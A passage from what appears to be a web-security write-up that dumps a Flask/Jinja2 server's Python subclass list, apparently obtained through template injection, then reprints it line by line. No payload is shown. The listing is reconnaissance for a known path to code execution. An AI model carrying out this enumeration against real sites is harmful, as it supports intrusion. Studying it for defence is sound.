'flask.config.ConfigAttribute'>, <class 'flask.ctx._AppCtxGlobals'>, <class 'flask.ctx.AppContext'>, <class 'flask.ctx.RequestContext'>, <class 'flask.json.tag.JSONTag'>, <class 'flask.json.tag.TaggedJSONSerializer'>, <class 'flask.sessions.SessionInterface'>, <class 'werkzeug.wrappers.json._JSONModule'>, <class 'werkzeug.wrappers.json.JSONMixin'>, <class 'flask.blueprints.BlueprintSetupState'>, <class 'typing._Final'>, <class 'typing._Immutable'>, <class 'typing.Generic'>, <class 'typing._TypingEmpty'>, <class 'typing._TypingEllipsis'>, <class 'typing.NamedTuple'>, <class 'typing.io'>, <class 'typing.re'>, <class 'six._LazyDescr'>, <class 'six._SixMetaPathImporter'>, <class 'cryptography.hazmat.primitives.asymmetric.AsymmetricSignatureContext'>, <class 'cryptography.hazmat.primitives.asymmetric.AsymmetricVerificationContext'>, <class 'unicodedata.UCD'>, <class 'asn1crypto.util.extended_date'>, <class 'asn1crypto.util.extended_datetime'>, <class 'CArgObject'>, <class '_ctypes.CThunkObject'>, <class '_ctypes._CData'>, <class '_ctypes.CField'>, <class '_ctypes.DictRemover'>, <class 'ctypes.CDLL'>, <class 'ctypes.LibraryLoader'>, <class 'asn1crypto.core.Asn1Value'>, <class 'asn1crypto.core.ValueMap'>, <class 'asn1crypto.core.Castable'>, <class 'asn1crypto.core.Constructable'>, <class 'asn1crypto.core.Concat'>, <class 'asn1crypto.core.BitString'>, <class 'asn1crypto.algos._ForceNullParameters'>, <class 'cryptography.utils._DeprecatedValue'>, <class 'cryptography.utils._ModuleWithDeprecations'>, <class 'cryptography.hazmat.backends.interfaces.CipherBackend'>, <class 'cryptography.hazmat.backends.interfaces.HashBackend'>, <class 'cryptography.hazmat.backends.interfaces.HMACBackend'>, <class 'cryptography.hazmat.backends.interfaces.CMACBackend'>, <class 'cryptography.hazmat.backends.interfaces.PBKDF2HMACBackend'>, <class 'cryptography.hazmat.backends.interfaces.RSABackend'>, <class 'cryptography.hazmat.backends.interfaces.DSABackend'>, <class 'cryptography.hazmat.backends.interfaces.EllipticCurveBackend'>, <class 'cryptography.hazmat.backends.interfaces.PEMSerializationBackend'>, <class 'cryptography.hazmat.backends.interfaces.DERSerializationBackend'>, <class 'cryptography.hazmat.backends.interfaces.X509Backend'>, <class 'cryptography.hazmat.backends.interfaces.DHBackend'>, <class 'cryptography.hazmat.backends.interfaces.ScryptBackend'>, <class 'cryptography.hazmat.primitives.hashes.HashAlgorithm'>, <class 'cryptography.hazmat.primitives.hashes.HashContext'>, <class 'cryptography.hazmat.primitives.hashes.ExtendableOutputFunction'>, <class 'cryptography.hazmat.primitives.hashes.Hash'>, <class 'cryptography.hazmat.primitives.hashes.SHA1'>, <class 'cryptography.hazmat.primitives.hashes.SHA512_224'>, <class 'cryptography.hazmat.primitives.hashes.SHA512_256'>, <class 'cryptography.hazmat.primitives.hashes.SHA224'>, <class 'cryptography.hazmat.primitives.hashes.SHA256'>, <class 'cryptography.hazmat.primitives.hashes.SHA384'>, <class 'cryptography.hazmat.primitives.hashes.SHA512'>, <class 'cryptography.hazmat.primitives.hashes.SHA3_224'>, <class 'cryptography.hazmat.primitives.hashes.SHA3_256'>, <class 'cryptography.hazmat.primitives.hashes.SHA3_384'>, <class 'cryptography.hazmat.primitives.hashes.SHA3_512'>, <class 'cryptography.hazmat.primitives.hashes.SHAKE128'>, <class 'cryptography.hazmat.primitives.hashes.SHAKE256'>, <class 'cryptography.hazmat.primitives.hashes.MD5'>, <class 'cryptography.hazmat.primitives.hashes.BLAKE2b'>, <class 'cryptography.hazmat.primitives.hashes.BLAKE2s'>, <class 'cryptography.hazmat.primitives.asymmetric.utils.Prehashed'>, <class 'cryptography.hazmat.primitives.serialization.base.KeySerializationEncryption'>, <class 'cryptography.hazmat.primitives.serialization.base.BestAvailableEncryption'>, <class 'cryptography.hazmat.primitives.serialization.base.NoEncryption'>, <class 'cryptography.hazmat.primitives.asymmetric.dsa.DSAParameters'>, <class 'cryptography.hazmat.primitives.asymmetric.dsa.DSAPrivateKey'>, <class 'cryptography.hazmat.primitives.asymmetric.dsa.DSAPublicKey'>, <class 'cryptography.hazmat.primitives.asymmetric.dsa.DSAParameterNumbers'>, <class 'cryptography.hazmat.primitives.asymmetric.dsa.DSAPublicNumbers'>, <class 'cryptography.hazmat.primitives.asymmetric.dsa.DSAPrivateNumbers'>, <class 'cryptography.hazmat._oid.ObjectIdentifier'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurveOID'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurve'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurveSignatureAlgorithm'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurvePrivateKey'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurvePublicKey'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECT571R1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECT409R1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECT283R1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECT233R1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECT163R2'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECT571K1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECT409K1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECT283K1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECT233K1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECT163K1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECP521R1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECP384R1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECP256R1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECP256K1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECP224R1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.SECP192R1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.BrainpoolP256R1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.BrainpoolP384R1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.BrainpoolP512R1'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.ECDSA'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurvePublicNumbers'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.EllipticCurvePrivateNumbers'>, <class 'cryptography.hazmat.primitives.asymmetric.ec.ECDH'>, <class 'cryptography.hazmat.primitives.asymmetric.ed25519.Ed25519PublicKey'>, <class 'cryptography.hazmat.primitives.asymmetric.ed25519.Ed25519PrivateKey'>, <class 'cryptography.hazmat.primitives.asymmetric.rsa.RSAPrivateKey'>, <class 'cryptography.hazmat.primitives.asymmetric.rsa.RSAPrivateKey'>, <class 'cryptography.hazmat.primitives.asymmetric.rsa.RSAPublicKey'>, <class 'cryptography.hazmat.primitives.asymmetric.rsa.RSAPrivateNumbers'>, <class 'cryptography.hazmat.primitives.asymmetric.rsa.RSAPublicNumbers'>, <class 'cryptography.hazmat.primitives.asymmetric.padding.AsymmetricPadding'>, <class 'cryptography.hazmat.primitives.asymmetric.padding.PKCS1v15'>, <class 'cryptography.hazmat.primitives.asymmetric.padding.PSS'>, <class 'cryptography.hazmat.primitives.asymmetric.padding.OAEP'>, <class 'cryptography.hazmat.primitives.asymmetric.padding.MGF1'>, <class 'jwt.algorithms.Algorithm'>, <class 'jwt.api_jws.PyJWS'>, <class 'jinja2.ext.Extension'>, <class 'jinja2.ext._CommentFinder'>, <class 'jinja2.debug.TracebackFrameProxy'>, <class 'jinja2.debug.ProcessedTraceback'>]</span></h1>
</div>
</body>

<script src="/static/js/snow.js"></script>
```

Here the list of classes in a more readable way.

```python
[<class 'type'>,
<class 'weakref'>,
<class 'weakcallableproxy'>,
<class 'weakproxy'>,
<class 'int'>,
<class 'bytearray'>,
<class 'bytes'>,
<class 'list'>,
<class 'NoneType'>,
<class 'NotImplementedType'>,
<class 'traceback'>,
<class 'super'>,
<class 'range'>,
<class 'dict'>,
<class 'dict_keys'>,
<class 'dict_values'>,
<class 'dict_items'>,
<class 'odict_iterator'>,
<class 'set'>,
<class 'str'>,
<class 'slice'>,
<class 'staticmethod'>,
<class 'complex'>,
<class 'float'>,
<class 'frozenset'>,
<class 'property'>,
<class 'managedbuffer'>,
<class 'memoryview'>,
<class 'tuple'>,
<class 'enumerate'>,
<class 'reversed'>,
<class 'stderrprinter'>,
<class 'code'>,
<class 'frame'>,
<class 'builtin_function_or_method'>,
<class 'method'>,
<class 'function'>,
<class 'mappingproxy'>,
<class 'generator'>,
<class 'getset_descriptor'>,
<class 'wrapper_descriptor'>,
<class 'method-wrapper'>,
<class 'ellipsis'>,
<class 'member_descriptor'>,
<class 'types.SimpleNamespace'>,
<class 'PyCapsule'>,
<class 'longrange_iterator'>,
<class 'cell'>,
<class 'instancemethod'>,
<class 'classmethod_descriptor'>,
<class 'method_descriptor'>,
<class 'callable_iterator'>,
<class 'iterator'>,
<class 'coroutine'>,
<class 'coroutine_wrapper'>,
<class 'moduledef'>,
<class 'module'>,
<class 'EncodingMap'>,
<class 'fieldnameiterator'>,
<class 'formatteriterator'>,
<class 'filter'>,
<class 'map'>,
<class 'zip'>,
<class 'BaseException'>,
<class 'hamt'>,
<class 'hamt_array_node'>,
<class 'hamt_bitmap_node'>,
<class 'hamt_collision_node'>,
<class 'keys'>,
<class 'values'>,
<class 'items'>,
<class 'Context'>,
<class 'ContextVar'>,
<class 'Token'>,
<class 'Token.MISSING'>,
<class '_frozen_importlib._ModuleLock'>,
<class '_frozen_importlib._DummyModuleLock'>,
<class '_frozen_importlib._ModuleLockManager'>,
<class '_frozen_importlib._installed_safely'>,
<class '_frozen_importlib.ModuleSpec'>,
<class '_frozen_importlib.BuiltinImporter'>,
<class 'classmethod'>,
<class '_frozen_importlib.FrozenImporter'>,
<class '_frozen_importlib._ImportLockContext'>,
<class '_thread._localdummy'>,
<class '_thread._local'>,
<class '_thread.lock'>,
<class '_thread.RLock'>,
<class 'zipimport.zipimporter'>,
<class '_frozen_importlib_external.WindowsRegistryFinder'>,
<class '_frozen_importlib_external._LoaderBasics'>,
<class '_frozen_importlib_external.FileLoader'>,
<class '_frozen_importlib_external._NamespacePath'>,
<class '_frozen_importlib_external._NamespaceLoader'>,
<class '_frozen_importlib_external.PathFinder'>,
<class '_frozen_importlib_external.FileFinder'>,
<class '_io._IOBase'>,
<class '_io._BytesIOBuffer'>,
<class '_io.IncrementalNewlineDecoder'>,
<class 'posix.ScandirIterator'>,
<class 'posix.DirEntry'>,
<class 'codecs.Codec'>,
<class 'codecs.IncrementalEncoder'>,
<class 'codecs.IncrementalDecoder'>,
<class 'codecs.StreamReaderWriter'>,
<class 'codecs.StreamRecoder'>,
<class '_abc_data'>,
<class 'abc.ABC'>,
<class 'dict_itemiterator'>,
<class 'collections.abc.Hashable'>,
<class 'collections.abc.Awaitable'>,
<class 'collections.abc.AsyncIterable'>,
<class 'async_generator'>,
<class 'collections.abc.Iterable'>,
<class 'bytes_iterator'>,
<class 'bytearray_iterator'>,
<class 'dict_keyiterator'>,
<class 'dict_valueiterator'>,
<class 'list_iterator'>,
<class 'list_reverseiterator'>,
<class 'range_iterator'>,
<class 'set_iterator'>,
<class 'str_iterator'>,
<class 'tuple_iterator'>,
<class 'collections.abc.Sized'>,
<class 'collections.abc.Container'>,
<class 'collections.abc.Callable'>,
<class 'os._wrap_close'>,
<class '_sitebuiltins.Quitter'>,
<class '_sitebuiltins._Printer'>,
<class '_sitebuiltins._Helper'>,
<class 'types.DynamicClassAttribute'>,
<class 'types._GeneratorWrapper'>,
<class 'collections.deque'>,
<class '_collections._deque_iterator'>,
<class '_collections._deque_reverse_iterator'>,
<class 'enum.auto'>,
<enum 'Enum'>,
<class 're.Pattern'>,
<class 're.Match'>,
<class '_sre.SRE_Scanner'>,
<class 'sre_parse.Pattern'>,
<class 'sre_parse.SubPattern'>,
<class 'sre_parse.Tokenizer'>,
<class 'functools.partial'>,
<class 'functools._lru_cache_wrapper'>,
<class 'operator.itemgetter'>,
<class 'operator.attrgetter'>,
<class 'operator.methodcaller'>,
<class 'itertools.accumulate'>,
<class 'itertools.combinations'>,
<class 'itertools.combinations_with_replacement'>,
<class 'itertools.cycle'>,
<class 'itertools.dropwhile'>,
<class 'itertools.takewhile'>,
<class 'itertools.islice'>,
<class 'itertools.starmap'>,
<class 'itertools.chain'>,
<class 'itertools.compress'>,
<class 'itertools.filterfalse'>,
<class 'itertools.count'>,
<class 'itertools.zip_longest'>,
<class 'itertools.permutations'>,
<class 'itertools.product'>,
<class 'itertools.repeat'>,
<class 'itertools.groupby'>,
<class 'itertools._grouper'>,
<class 'itertools._tee'>,
<class 'itertools._tee_dataobject'>,
<class 'reprlib.Repr'>,
<class 'collections._Link'>,
<class 'functools.partialmethod'>,
<class 're.Scanner'>,
<class '__future__._Feature'>,
<class 'warnings.WarningMessage'>,
<class 'warnings.catch_warnings'>,
<class 'importlib.abc.Finder'>,
<class 'importlib.abc.Loader'>,
<class 'importlib.abc.ResourceReader'>,
<class 'contextlib.ContextDecorator'>,
<class 'contextlib._GeneratorContextManagerBase'>,
<class 'contextlib._BaseExitStack'>,
<class 'zlib.Compress'>,
<class 'zlib.Decompress'>,
<class 'tokenize.Untokenizer'>,
<class 'traceback.FrameSummary'>,
<class 'traceback.TracebackException'>,
<class '_weakrefset._IterationGuard'>,
<class '_weakrefset.WeakSet'>,
<class 'threading._RLock'>,
<class 'threading.Condition'>,
<class 'threading.Semaphore'>,
<class 'threading.Event'>,
<class 'threading.Barrier'>,
<class 'threading.Thread'>,
<class '_bz2.BZ2Compressor'>,
<class '_bz2.BZ2Decompressor'>,
<class '_lzma.LZMACompressor'>,
<class '_lzma.LZMADecompressor'>,
<class 'Struct'>,
<class 'unpack_iterator'>,
<class 'zipfile.ZipInfo'>,
<class 'zipfile.LZMACompressor'>,
<class 'zipfile.LZMADecompressor'>,
<class 'zipfile._SharedFile'>,
<class 'zipfile._Tellable'>,
<class 'zipfile.ZipFile'>,
<class 'weakref.finalize._Info'>,
<class 'weakref.finalize'>,
<class 'pkgutil.ImpImporter'>,
<class 'pkgutil.ImpLoader'>,
<class 'select.poll'>,
<class 'select.epoll'>,
<class 'selectors.BaseSelector'>,
<class 'subprocess.CompletedProcess'>,
<class 'subprocess.Popen'>,
<class 'datetime.date'>,
<class 'datetime.timedelta'>,
<class 'datetime.time'>,
<class 'datetime.tzinfo'>,
<class 'pyexpat.xmlparser'>,
<class 'plistlib.Data'>,
<class 'plistlib._PlistParser'>,
<class 'plistlib._DumbXMLWriter'>,
<class 'plistlib._BinaryPlistParser'>,
<class 'plistlib._BinaryPlistWriter'>,
<class 'string.Template'>,
<class 'string.Formatter'>,
<class 'email.charset.Charset'>,
<class 'email.header.Header'>,
<class 'email.header._ValueFormatter'>,
<class '_hashlib.HASH'>,
<class '_blake2.blake2b'>,
<class '_blake2.blake2s'>,
<class '_sha3.sha3_224'>,
<class '_sha3.sha3_256'>,
<class '_sha3.sha3_384'>,
<class '_sha3.sha3_512'>,
<class '_sha3.shake_128'>,
<class '_sha3.shake_256'>,
<class '_random.Random'>,
<class '_socket.socket'>,
<class 'urllib.parse._ResultMixinStr'>,
<class 'urllib.parse._ResultMixinBytes'>,
<class 'urllib.parse._NetlocResultMixinBase'>,
<class 'calendar._localized_month'>,
<class 'calendar._localized_day'>,
<class 'calendar.Calendar'>,
<class 'calendar.different_locale'>,
<class 'email._parseaddr.AddrlistClass'>,
<class 'email._policybase._PolicyBase'>,
<class 'email.feedparser.BufferedSubFile'>,
<class 'email.feedparser.FeedParser'>,
<class 'email.parser.Parser'>,
<class 'email.parser.BytesParser'>,
<class 'tempfile._RandomNameSequence'>,
<class 'tempfile._TemporaryFileCloser'>,
<class 'tempfile._TemporaryFileWrapper'>,
<class 'tempfile.SpooledTemporaryFile'>,
<class 'tempfile.TemporaryDirectory'>,
<class 'textwrap.TextWrapper'>,
<class 'dis.Bytecode'>,
<class 'inspect.BlockFinder'>,
<class 'inspect._void'>,
<class 'inspect._empty'>,
<class 'inspect.Parameter'>,
<class 'inspect.BoundArguments'>,
<class 'inspect.Signature'>,
<class 'pkg_resources.extern.VendorImporter'>,
<class 'pkg_resources._vendor.six._LazyDescr'>,
<class 'pkg_resources._vendor.six._SixMetaPathImporter'>,
<class 'pkg_resources._vendor.six._LazyDescr'>,
<class 'pkg_resources._vendor.six._SixMetaPathImporter'>,
<class 'pkg_resources._vendor.appdirs.AppDirs'>,
<class 'pkg_resources.extern.packaging._structures.Infinity'>,
<class 'pkg_resources.extern.packaging._structures.NegativeInfinity'>,
<class 'pkg_resources.extern.packaging.version._BaseVersion'>,
<class 'pkg_resources.extern.packaging.specifiers.BaseSpecifier'>,
<class 'pprint._safe_key'>,
<class 'pprint.PrettyPrinter'>,
<class 'pkg_resources._vendor.pyparsing._Constants'>,
<class 'pkg_resources._vendor.pyparsing._ParseResultsWithOffset'>,
<class 'pkg_resources._vendor.pyparsing.ParseResults'>,
<class 'pkg_resources._vendor.pyparsing.ParserElement._UnboundedCache'>,
<class 'pkg_resources._vendor.pyparsing.ParserElement._FifoCache'>,
<class 'pkg_resources._vendor.pyparsing.ParserElement'>,
<class 'pkg_resources._vendor.pyparsing._NullToken'>,
<class 'pkg_resources._vendor.pyparsing.OnlyOnce'>,
<class 'pkg_resources._vendor.pyparsing.pyparsing_common'>,
<class 'pkg_resources.extern.packaging.markers.Node'>,
<class 'pkg_resources.extern.packaging.markers.Marker'>,
<class 'pkg_resources.extern.packaging.requirements.Requirement'>,
<class 'pkg_resources.IMetadataProvider'>,
<class 'pkg_resources.WorkingSet'>,
<class 'pkg_resources.Environment'>,
<class 'pkg_resources.ResourceManager'>,
<class 'pkg_resources.NullProvider'>,
<class 'pkg_resources.NoDists'>,
<class 'pkg_resources.EntryPoint'>,
<class 'pkg_resources.Distribution'>,
<class 'gunicorn.six._LazyDescr'>,
<class 'gunicorn.six._SixMetaPathImporter'>,
<class 'logging.LogRecord'>,
<class 'logging.PercentStyle'>,
<class 'logging.Formatter'>,
<class 'logging.BufferingFormatter'>,
<class 'logging.Filter'>,
<class 'logging.Filterer'>,
<class 'logging.PlaceHolder'>,
<class 'logging.Manager'>,
<class 'logging.LoggerAdapter'>,
<class 'gunicorn.pidfile.Pidfile'>,
<class 'gunicorn.sock.BaseSocket'>,
<class 'gunicorn.arbiter.Arbiter'>,
<class 'gettext.NullTranslations'>,
<class 'argparse._AttributeHolder'>,
<class 'argparse.HelpFormatter._Section'>,
<class 'argparse.HelpFormatter'>,
<class 'argparse.FileType'>,
<class 'argparse._ActionsContainer'>,
<class '_ssl._SSLContext'>,
<class '_ssl._SSLSocket'>,
<class '_ssl.MemoryBIO'>,
<class '_ssl.Session'>,
<class 'ssl.SSLObject'>,
<class 'shlex.shlex'>,
<class 'gunicorn.reloader.InotifyReloader'>,
<class 'gunicorn.config.Config'>,
<class 'gunicorn.config.Setting'>,
<class 'gunicorn.debug.Spew'>,
<class 'gunicorn.app.base.BaseApplication'>,
<class 'pickle._Framer'>,
<class 'pickle._Unframer'>,
<class 'pickle._Pickler'>,
<class 'pickle._Unpickler'>,
<class '_pickle.Unpickler'>,
<class '_pickle.Pickler'>,
<class '_pickle.Pdata'>,
<class '_pickle.PicklerMemoProxy'>,
<class '_pickle.UnpicklerMemoProxy'>,
<class '_queue.SimpleQueue'>,
<class 'queue.Queue'>,
<class 'queue._PySimpleQueue'>,
<class 'logging.handlers.QueueListener'>,
<class 'socketserver.BaseServer'>,
<class 'socketserver.ForkingMixIn'>,
<class 'socketserver.ThreadingMixIn'>,
<class 'socketserver.BaseRequestHandler'>,
<class 'logging.config.ConvertingMixin'>,
<class 'logging.config.BaseConfigurator'>,
<class 'gunicorn.glogging.Logger'>,
<class 'gunicorn.http.unreader.Unreader'>,
<class 'gunicorn.http.body.ChunkedReader'>,
<class 'gunicorn.http.body.LengthReader'>,
<class 'gunicorn.http.body.EOFReader'>,
<class 'gunicorn.http.body.Body'>,
<class 'gunicorn.http.message.Message'>,
<class 'gunicorn.http.parser.Parser'>,
<class 'gunicorn.http.wsgi.FileWrapper'>,
<class 'gunicorn.http.wsgi.Response'>,
<class 'gunicorn.workers.workertmp.WorkerTmp'>,
<class 'gunicorn.workers.base.Worker'>,
<class 'concurrent.futures._base._Waiter'>,
<class 'concurrent.futures._base._AcquireFutures'>,
<class 'concurrent.futures._base.Future'>,
<class 'concurrent.futures._base.Executor'>,
<class 'asyncio.coroutines.CoroWrapper'>,
<class 'asyncio.events.Handle'>,
<class 'asyncio.events.AbstractServer'>,
<class 'asyncio.events.AbstractEventLoop'>,
<class 'asyncio.events.AbstractEventLoopPolicy'>,
<class '_asyncio.Future'>,
<class '_asyncio.FutureIter'>,
<class 'TaskStepMethWrapper'>,
<class 'TaskWakeupMethWrapper'>,
<class '_RunningLoopHolder'>,
<class 'asyncio.futures.Future'>,
<class 'asyncio.protocols.BaseProtocol'>,
<class 'asyncio.transports.BaseTransport'>,
<class 'asyncio.sslproto._SSLPipe'>,
<class 'asyncio.locks._ContextManager'>,
<class 'asyncio.locks._ContextManagerMixin'>,
<class 'asyncio.locks.Event'>,
<class 'asyncio.queues.Queue'>,
<class 'asyncio.streams.StreamWriter'>,
<class 'asyncio.streams.StreamReader'>,
<class 'asyncio.subprocess.Process'>,
<class 'asyncio.unix_events.AbstractChildWatcher'>,
<class 'gunicorn.selectors.BaseSelector'>,
<class 'gunicorn.workers.gthread.TConn'>,
<class 'concurrent.futures.thread._WorkItem'>,
<class '_ast.AST'>,
<class '_json.Scanner'>,
<class '_json.Encoder'>,
<class 'json.decoder.JSONDecoder'>,
<class 'json.encoder.JSONEncoder'>,
<class 'jinja2.utils.MissingType'>,
<class 'jinja2.utils.LRUCache'>,
<class 'jinja2.utils.Cycler'>,
<class 'jinja2.utils.Joiner'>,
<class 'jinja2.utils.Namespace'>,
<class 'markupsafe._MarkupEscapeHelper'>,
<class 'jinja2.nodes.EvalContext'>,
<class 'jinja2.nodes.Node'>,
<class 'jinja2.runtime.TemplateReference'>,
<class 'jinja2.runtime.Context'>,
<class 'jinja2.runtime.BlockReference'>,
<class 'jinja2.runtime.LoopContextBase'>,
<class 'jinja2.runtime.LoopContextIterator'>,
<class 'jinja2.runtime.Macro'>,
<class 'jinja2.runtime.Undefined'>,
<class 'decimal.Decimal'>,
<class 'decimal.Context'>,
<class 'decimal.SignalDictMixin'>,
<class 'decimal.ContextManager'>,
<class 'numbers.Number'>,
<class 'jinja2.lexer.Failure'>,
<class 'jinja2.lexer.TokenStreamIterator'>,
<class 'jinja2.lexer.TokenStream'>,
<class 'jinja2.lexer.Lexer'>,
<class 'jinja2.parser.Parser'>,
<class 'jinja2.visitor.NodeVisitor'>,
<class 'jinja2.idtracking.Symbols'>,
<class 'jinja2.compiler.MacroRef'>,
<class 'jinja2.compiler.Frame'>,
<class 'jinja2.environment.Environment'>,
<class 'jinja2.environment.Template'>,
<class 'jinja2.environment.TemplateModule'>,
<class 'jinja2.environment.TemplateExpression'>,
<class 'jinja2.environment.TemplateStream'>,
<class 'jinja2.loaders.BaseLoader'>,
<class 'jinja2.bccache.Bucket'>,
<class 'jinja2.bccache.BytecodeCache'>,
<class 'jinja2.asyncsupport.AsyncLoopContextIterator'>,
<class 'werkzeug._internal._Missing'>,
<class 'werkzeug._internal._DictAccessorProperty'>,
<class 'werkzeug.utils.HTMLBuilder'>,
<class 'werkzeug.exceptions.Aborter'>,
<class 'werkzeug.urls.Href'>,
<class 'email.message.Message'>,
<class 'http.client.HTTPConnection'>,
<class 'mimetypes.MimeTypes'>,
<class 'werkzeug.serving.WSGIRequestHandler'>,
<class 'werkzeug.serving._SSLContext'>,
<class 'werkzeug.serving.BaseWSGIServer'>,
<class 'werkzeug.datastructures.ImmutableListMixin'>,
<class 'werkzeug.datastructures.ImmutableDictMixin'>,
<class 'werkzeug.datastructures.UpdateDictMixin'>,
<class 'werkzeug.datastructures.ViewItems'>,
<class 'werkzeug.datastructures._omd_bucket'>,
<class 'werkzeug.datastructures.Headers'>,
<class 'werkzeug.datastructures.ImmutableHeadersMixin'>,
<class 'werkzeug.datastructures.IfRange'>,
<class 'werkzeug.datastructures.Range'>,
<class 'werkzeug.datastructures.ContentRange'>,
<class 'werkzeug.datastructures.FileStorage'>,
<class 'urllib.request.Request'>,
<class 'urllib.request.OpenerDirector'>,
<class 'urllib.request.BaseHandler'>,
<class 'urllib.request.HTTPPasswordMgr'>,
<class 'urllib.request.AbstractBasicAuthHandler'>,
<class 'urllib.request.AbstractDigestAuthHandler'>,
<class 'urllib.request.URLopener'>,
<class 'urllib.request.ftpwrapper'>,
<class 'werkzeug.wrappers.accept.AcceptMixin'>,
<class 'werkzeug.wrappers.auth.AuthorizationMixin'>,
<class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>,
<class 'werkzeug.wsgi.ClosingIterator'>,
<class 'werkzeug.wsgi.FileWrapper'>,
<class 'werkzeug.wsgi._RangeWrapper'>,
<class 'werkzeug.formparser.FormDataParser'>,
<class 'werkzeug.formparser.MultiPartParser'>,
<class 'werkzeug.wrappers.base_request.BaseRequest'>,
<class 'werkzeug.wrappers.base_response.BaseResponse'>,
<class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>,
<class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>,
<class 'werkzeug.wrappers.etag.ETagRequestMixin'>,
<class 'werkzeug.wrappers.etag.ETagResponseMixin'>,
<class 'werkzeug.useragents.UserAgentParser'>,
<class 'werkzeug.useragents.UserAgent'>,
<class 'werkzeug.wrappers.user_agent.UserAgentMixin'>,
<class 'werkzeug.wrappers.request.StreamOnlyMixin'>,
<class 'werkzeug.wrappers.response.ResponseStream'>,
<class 'werkzeug.wrappers.response.ResponseStreamMixin'>,
<class 'http.cookiejar.Cookie'>,
<class 'http.cookiejar.CookiePolicy'>,
<class 'http.cookiejar.Absent'>,
<class 'http.cookiejar.CookieJar'>,
<class 'werkzeug.test._TestCookieHeaders'>,
<class 'werkzeug.test._TestCookieResponse'>,
<class 'werkzeug.test.EnvironBuilder'>,
<class 'werkzeug.test.Client'>,
<class 'uuid.UUID'>,
<class 'itsdangerous._json._CompactJSON'>,
<class 'hmac.HMAC'>,
<class 'itsdangerous.signer.SigningAlgorithm'>,
<class 'itsdangerous.signer.Signer'>,
<class 'itsdangerous.serializer.Serializer'>,
<class 'itsdangerous.url_safe.URLSafeSerializerMixin'>,
<class 'flask._compat._DeprecatedBool'>,
<class 'greenlet.greenlet'>,
<class 'werkzeug.local.Local'>,
<class 'werkzeug.local.LocalStack'>,
<class 'werkzeug.local.LocalManager'>,
<class 'werkzeug.local.LocalProxy'>,
<class 'dataclasses._HAS_DEFAULT_FACTORY_CLASS'>,
<class 'dataclasses._MISSING_TYPE'>,
<class 'dataclasses._FIELD_BASE'>,
<class 'dataclasses.InitVar'>,
<class 'dataclasses.Field'>,
<class 'dataclasses._DataclassParams'>,
<class 'ast.NodeVisitor'>,
<class 'difflib.SequenceMatcher'>,
<class 'difflib.Differ'>,
<class 'difflib.HtmlDiff'>,
<class 'werkzeug.routing.RuleFactory'>,
<class 'werkzeug.routing.RuleTemplate'>,
<class 'werkzeug.routing.BaseConverter'>,
<class 'werkzeug.routing.Map'>,
<class 'werkzeug.routing.MapAdapter'>,
<class 'click._compat._FixupStream'>,
<class 'click._compat._AtomicFile'>,
<class 'click.utils.LazyFile'>,
<class 'click.utils.KeepOpenFile'>,
<class 'click.utils.PacifyFlushWrapper'>,
<class 'click.types.ParamType'>,
<class 'click.parser.Option'>,
<class 'click.parser.Argument'>,
<class 'click.parser.ParsingState'>,
<class 'click.parser.OptionParser'>,
<class 'click.formatting.HelpFormatter'>,
<class 'click.core.Context'>,
<class 'click.core.BaseCommand'>,
<class 'click.core.Parameter'>,
<class 'flask.signals.Namespace'>,
<class 'flask.signals._FakeSignal'>,
<class 'flask.helpers.locked_cached_property'>,
<class 'flask.helpers._PackageBoundObject'>,
<class 'flask.cli.DispatchingApp'>,
<class 'flask.cli.ScriptInfo'>,
<class 'flask.config.ConfigAttribute'>,
<class 'flask.ctx._AppCtxGlobals'>,
<class 'flask.ctx.AppContext'>,
<class 'flask.ctx.RequestContext'>,
<class 'flask.json.tag.JSONTag'>,
<class 'flask.json.tag.TaggedJSONSerializer'>,
<class 'flask.sessions.SessionInterface'>,
<class 'werkzeug.wrappers.json._JSONModule'>,
<class 'werkzeug.wrappers.json.JSONMixin'>,
<class 'flask.blueprints.BlueprintSetupState'>,
<class 'typing._Final'>,
<class 'typing._Immutable'>,
<class 'typing.Generic'>,
<class 'typing._TypingEmpty'>,
<class 'typing._TypingEllipsis'>,
<class 'typing.NamedTuple'>,
<class 'typing.io'>,
<class 'typing.re'>,
<class 'six._LazyDescr'>,
<class 'six._SixMetaPathImporter'>,
<class 'cryptography.hazmat.primitives.asymmetric.AsymmetricSignatureContext'>,
<class 'cryptography.hazmat.primitives.asymmetric.AsymmetricVerificationContext'>,
<class 'unicodedata.UCD'>,
<class 'asn1crypto.util.extended_date'>,
<class 'asn1crypto.util.extended_datetime'>,
<class 'CArgObject'>,
<class '_ctypes.CThunkObject'>,
<class '_ctypes._CData'>,
<class '_ctypes.CField'>,
<class '_ctypes.DictRemover'>,
<class 'ctypes.CDLL'>,
<class 'ctypes.LibraryLoader'>,
<class 'asn1crypto.core.Asn1Value'>,
<class 'asn1crypto.core.ValueMap'>,
<class 'asn1crypto.core.Castable'>,
<class 'asn1crypto.core.Constructable'>,
